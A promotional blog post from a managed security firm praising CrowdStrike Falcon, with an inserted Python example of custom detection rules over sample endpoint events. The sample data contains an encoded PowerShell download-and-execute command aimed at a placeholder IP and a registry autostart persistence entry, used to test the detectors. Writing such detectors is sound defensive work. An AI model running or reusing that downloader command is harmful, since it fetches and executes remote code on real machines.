RADICL Blog

7 Reasons Why RADICL (STILL!) Loves CrowdStrike

Written by Chris Petersen | 2024 | 07

RADICL is on a mission to bring enterprise-grade, defense-in-depth cybersecurity to the SMB segment. We prioritize CrowdStrike because it is the proven and trusted leader in endpoint protection, detection, and response for the world's most demanding enterprises and government agencies.

We want our SMB customers to have this same class of protection. Fortunately, we were able to partner with CrowdStrike to deliver this technology to our customers. Since that partnership began, we have come to fully appreciate the power of CrowdStrike and to understand more deeply why they were the best and remain the best.

Following are the 7 principal reasons why we love partnering with CrowdStrike:

#1: Unrivaled Threat Intelligence.

You can only detect and prevent what you know to look for. CrowdStrike’s threat intelligence (TI) capabilities are second to none, apart from nation-state agencies such as the NSA. CrowdStrike has also long been a leader in synthesizing and sharing threat intelligence with the community. CrowdStrike TI is gathered via three distinct and complementary intelligence channels.

Dedicated Threat Intelligence Research

CrowdStrike has a large and dedicated threat research function that employs analysts whose sole job is to proactively identify emerging threat actors and continuously keep abreast of their ever-evolving motivations and techniques. CrowdStrike hires the best to serve this function, often pulling talent from government entities (e.g., AFCYBER, NSA, FBI) directly involved in fighting and defending against nation-state cyber threats.

Incident Response

CrowdStrike has developed a reputation as one of the few companies trusted to investigate and respond to high-profile, high-impact incidents affecting the world’s leading corporations and government entities. Responding to these incidents provides unique intelligence on how cybercriminals and Advanced Persistent Threats (APTs) are circumventing defenses and penetrating extremely well-defended organizations.

Extremely Large Global Install Base

CrowdStrike Falcon is the most widely deployed endpoint protection platform (aka “EPP”) and endpoint detection and response (aka “EDR”) technology in the world. Its unrivaled breadth of deployment provides visibility into endpoint and server activity across the globe, ensuring emerging malware and attack techniques are quickly identified regardless of geographic source.

#2: Leading Threat Detection Capabilities

CrowdStrike Falcon leverages both behavioral (indicator-of-attack) and signature-based methods for detecting malware and attacks. Falcon’s threat detection capabilities are one reason CrowdStrike has been consistently ranked by Gartner and other industry analysts as the overall best EPP/EDR technology in the world. CrowdStrike’s unrivaled threat intelligence, combined with Falcon’s threat detection engine, provides the best protection possible from known threats and their techniques.

#3: Custom Threat Detection Rules and Tuning

No one company can know it all, and not all customers are the same. Even though CrowdStrike’s Threat Intelligence is unrivaled, it is not omniscient. RADLabs fills TI gaps that are unique to our individual customers. We conduct weekly hunts into customer environments, looking for novel threats based on our TI. Doing this well requires a technology that lets us turn our TI and hunt findings into additional customized, automated detection rules. CrowdStrike’s platform is unique because it allows us to develop and deploy custom threat detection rules for our customers. It also allows us to tune the detection engine and its policies so that they align with each customer’s business and industry considerations, for example by suppressing alerts on a known-good application that is noisy in one environment but would be suspicious elsewhere.

#4: Deep Forensic Visibility

Unfortunately, even with the best threat intelligence and best detection engine, threats can slip through. Never-before-seen attack techniques, and exploits for vulnerabilities that have no patch yet (aka “zero-days”), allow sophisticated threat actors to bypass even the best security technologies. Furthermore, threats can emerge from within (aka “insider threats”) or impersonate internal users whose credentials were obtained by phishing.

When threats have bypassed defenses and are operating from within, they become much more difficult to detect and block. Eventually, indicators of their presence will surface, either from CrowdStrike or from other threat detection techniques. When this happens, deeper investigation is required. CrowdStrike Falcon provides differentiated real-time visibility into endpoint and server activity that allows security analysts and incident responders to more quickly root out threats operating from within and purge them from customer environments. This visibility includes:

  • Program and process execution
  • File reads, writes, and transfers
  • Command line and PowerShell activity
  • Network connections and DNS requests
  • Registry and program auto-start configuration changes
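To make reasons #3 and #4 concrete, here is an added illustration (not RADICL’s or CrowdStrike’s code) of how hunt findings become custom, tunable detection rules that run over exactly the telemetry listed above: process execution with parent lineage and command line, DNS requests, and registry autostart changes. The event records are constructed for this example in a generic shape, not Falcon’s real schema; the rule names, the `Tuning` allowlist, and the sample hosts and paths are all assumptions.

```python
"""Custom detection rules over constructed endpoint telemetry.

Added illustration only: not RADICL or CrowdStrike code. The event shape,
rule names, hosts and paths below are assumed for the example.
"""
import base64
import re
from dataclasses import dataclass, field

# Constructed attack chain: Word spawns an encoded PowerShell downloader,
# which resolves a domain and then writes a user Run-key autostart entry.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()  # PowerShell -enc form

SAMPLE_EVENTS = [
    {"type": "process", "host": "ws-017", "pid": 4120, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE", "cmdline": "WINWORD.EXE /n invoice.docx"},
    {"type": "process", "host": "ws-017", "pid": 4188, "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"type": "dns", "host": "ws-017", "pid": 4188, "query": "updates.example.net"},
    {"type": "registry", "host": "ws-017", "pid": 4188, "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Updater", "data": r"C:\Users\j.doe\AppData\Roaming\svc.exe"},
    # Benign noise a rule must not fire on: admin script and a known autostart entry.
    {"type": "process", "host": "ws-022", "pid": 980, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"type": "registry", "host": "ws-022", "pid": 1200, "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "OneDrive", "data": r"C:\Users\a.smith\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iex")


@dataclass
class Detection:
    rule: str
    severity: str
    host: str
    pid: int
    detail: str


@dataclass
class Tuning:
    """Per-customer exceptions: the 'tuning' applied on top of the base rules."""
    run_key_allowlist: set[str] = field(default_factory=lambda: {"onedrive", "securityhealth"})


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64), or None."""
    m = re.search(r"-(?:enc|encodedcommand|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def rule_office_spawns_script_host(ev, tuning):
    if ev["type"] == "process" and _basename(ev["parent_image"]) in OFFICE_APPS \
            and _basename(ev["image"]) in SCRIPT_HOSTS:
        return Detection("office_spawns_script_host", "high", ev["host"], ev["pid"],
                         f"{_basename(ev['parent_image'])} -> {ev['cmdline'][:60]}")
    return None


def rule_encoded_powershell_download(ev, tuning):
    if ev["type"] != "process" or _basename(ev["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return None
    decoded = decode_encoded_command(ev["cmdline"])
    if decoded and any(marker in decoded.lower() for marker in DOWNLOAD_MARKERS):
        return Detection("encoded_powershell_download", "critical", ev["host"], ev["pid"], decoded)
    return None


def rule_run_key_persistence(ev, tuning):
    """User Run key pointing into a user-writable directory, minus tuned exceptions."""
    if ev["type"] != "registry" or not ev["key"].lower().endswith(r"\currentversion\run"):
        return None
    if ev["value"].lower() in tuning.run_key_allowlist:
        return None
    if "\\appdata\\" in ev["data"].lower() or "\\temp\\" in ev["data"].lower():
        return Detection("run_key_persistence_user_writable", "medium", ev["host"], ev["pid"],
                         f"{ev['value']} = {ev['data']}")
    return None


RULES = [rule_office_spawns_script_host, rule_encoded_powershell_download, rule_run_key_persistence]


def run_rules(events, tuning=None):
    """Evaluate every rule against every event; return detections in event order."""
    tuning = tuning or Tuning()
    return [d for ev in events for rule in RULES if (d := rule(ev, tuning)) is not None]


def hosts_to_triage(detections):
    return sorted({d.host for d in detections if d.severity in {"high", "critical"}})


if __name__ == "__main__":
    for d in run_rules(SAMPLE_EVENTS):
        print(f"[{d.severity}] {d.rule} host={d.host} pid={d.pid}: {d.detail}")
    print("triage:", hosts_to_triage(run_rules(SAMPLE_EVENTS)))
```

Three things are worth noting. The encoded-command rule decodes the payload before matching, so the downloader is caught even though the raw command line contains nothing but base64; a detection that only string-matches `DownloadString` would miss it. The Run-key rule is where tuning lives: the allowlist is a per-customer exception list, so the same base rule fires on the attacker’s `Updater` entry but stays quiet on a known-good OneDrive autostart. And because all three hits carry the same host and process lineage, an analyst can treat them as one incident rather than three alerts.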

#5: Vulnerability Intelligence

In addition to preventing threats and providing great forensic visibility, the CrowdStrike agent can interrogate every system it is installed on and identify unpatched vulnerabilities. Not all EPP/EDR products have this capability, and having it in the same agent creates operational and cost efficiency for us and our customers, since we only need to deploy and manage one agent.

Vulnerability intelligence is critical to RADICL’s ability to help customers manage and shrink their attack surface. We leverage this visibility in our HARDEN feature to ensure critical vulnerabilities (aka “P1s”) are immediately acted on. We also leverage this visibility to incrementally reduce the number of exploitable vulnerabilities across our customer environments, thereby making them harder to attack and compromise successfully.

#6: Real-time Response (RTR) and Host Quarantine

CrowdStrike Falcon includes a powerful capability that not all EPP/EDR products have: the ability to remotely connect to a system in support of incident response and to quarantine compromised systems when necessary. Falcon’s Real-time Response (RTR) feature is extremely powerful. It allows our analysts to directly query and interrogate suspect or compromised systems in support of incident investigation and response. We are also able to remotely and safely execute commands and run scripts in support of rapid recovery efforts.

Falcon’s “Host Isolation” feature allows us to quarantine a compromised host from all other hosts within the customer’s network. This ensures a threat actor who has access to that host can no longer use it as a jumping-off point to further their goals. It also ensures that automated attacks (e.g., self-propagating malware) can no longer spread from the infected host to neighboring systems. This feature, along with RTR, ensures that our vSOC is able to investigate and respond at the fastest speed possible.

#7: Designed for Managed Operations

CrowdStrike is a pioneer in SaaS cybersecurity software delivery. They have architected and designed a platform and suite of products ideally suited to deliver as managed offerings. Most products aren’t designed and built to be delivered this way. Managed services built on deficient technology lead to poor user experience, higher cost of operations, and, ultimately, a higher price tag for the customer. Worse experience and higher price? No thanks!

Fortunately, CrowdStrike has been deliberately designed to support managed offerings like RADICL. This allows us to quickly and simply onboard and manage our customers while also delivering a highly sophisticated level of cyberthreat protection.

Conclusion

I have been working in cybersecurity my whole professional career. Those who have worked with me know I have incredibly high expectations. CrowdStrike has lived up to those expectations. They have built an incredible product and technology. We expect nothing but the best from ourselves and our partners. We are pleased and fortunate to have CrowdStrike by our side as we work to protect our customers.

As CrowdStrike puts it: “One Team. One Fight.” RADICL is all in. Full stop.